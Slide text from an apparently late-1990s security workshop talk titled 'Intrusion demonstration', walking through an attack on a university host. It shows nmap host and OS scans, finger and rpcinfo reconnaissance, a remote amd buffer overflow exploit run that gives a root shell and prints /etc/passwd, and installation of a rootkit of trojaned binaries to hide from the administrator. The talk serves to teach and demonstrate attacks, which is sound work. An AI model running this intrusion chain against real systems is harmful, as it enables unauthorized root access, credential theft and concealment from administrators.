Taeho Oh/PLUS 3rd CONCERT Workshop Nov Intrusion demonstration Part I Postech PLUS Taeho Oh (PLUS015)

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Contents Scan wide area network –Using powerful network scanner, nmap –Find the running hosts in the network –Gather the host information Get root permission from the target host Hide himself from the admin

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Scan wide area network (1) Using powerful network scanner, nmap –nmap can do ftp bounce scan, stealth scan, OS prediction, and so on. –

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Scan wide area network (2) Find the running hosts in the network [ ~ ] {1} # nmap -sP " xxx.*" Host ( xxx.0) appears to be up. Host ( xxx.0) seems to be a subnet broadcast address (returned 111 extra pings). Skipping host. Host kwxnxoo.postech.ac.kr ( xxx.7) appears to be up. Host xojx.postech.ac.kr ( xxx.9) appears to be up. (... ) Host victim.postech.ac.kr ( xxx.75) appears to be up. Host xstxos.postech.ac.kr ( xxx.77) appears to be up. Host anxelx.postech.ac.kr ( xxx.78) appears to be up. Host mxrlxns.postech.ac.kr ( xxx.79) appears to be up. Host ( xxx.99) appears to be up. Host ( xxx.255) appears to be up. Host ( xxx.255) seems to be a subnet broadcast address (returned 93 extra pings). Skipping host. Nmap run completed IP addresses (27 hosts up) scanned in 2 seconds

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Scan wide area network (3) Gather the host information [ ~ ] {2} # nmap -I -O Interesting ports on victim.postech.ac.kr ( xxx.75): Port State Protocol Service Owner 21 open tcp ftp root 23 open tcp telnet root 25 open tcp smtp root 53 open tcp domain root 79 open tcp finger root 80 open tcp http nobody (... ) 6000 open tcp X11 root TCP Sequence Prediction: Class=random positive increments Difficulty= (Good luck!) Remote operating system guess: Linux ; pre Nmap run completed -- 1 IP address (1 host up) scanned in 19 seconds

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Scan wide area network (4) Gather the host information [ ~ ] {3} # [ xxx.75] Login Name Tty Idle Login Time Office Office Phone kotaeji Kim Taehyung /0 20:46 Oct 27 19:41 [ ~ ] {4} # rpcinfo -p xxx.75 program vers proto port tcp 111 rpcbind udp 111 rpcbind (... ) udp 1026 nlockmgr udp 1026 nlockmgr tcp 1024 nlockmgr tcp 1024 nlockmgr tcp 878 amd udp 879 amd

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Get root permission from the target host Get root with amd buffer overflow exploit [ ~ ] {5} #./amd-ex xxx.75 Attack xxx.75 amq: could not start new autmount point: Connection timed out Connect to the shell Linux victim #1 Wed Jun 2 09:17:03 EDT 1999 i686 unknown uid=0(root) gid=0(root) id uid=0(root) gid=0(root) cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown (... )

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Hide himself from the admin Install rootkit Trojan files of ohhara rootkit –chgrp, chmod, chown, cp, ln, ls, mkdir, mknod, netstat, ps, touch, dir, du, find, mkfifo, oldps, top, vdir, fixdate, in.inetd, in.smbd, in.telnetd, pam.pwdb.so [ ~ ] {1} # tar -xzf ohhara-rootkit.tar.gz [ ~ ] {2} # cd ohhara-rootkit [ ~/ohhara-rootkit ] {3} #./install-ohhara-rootkit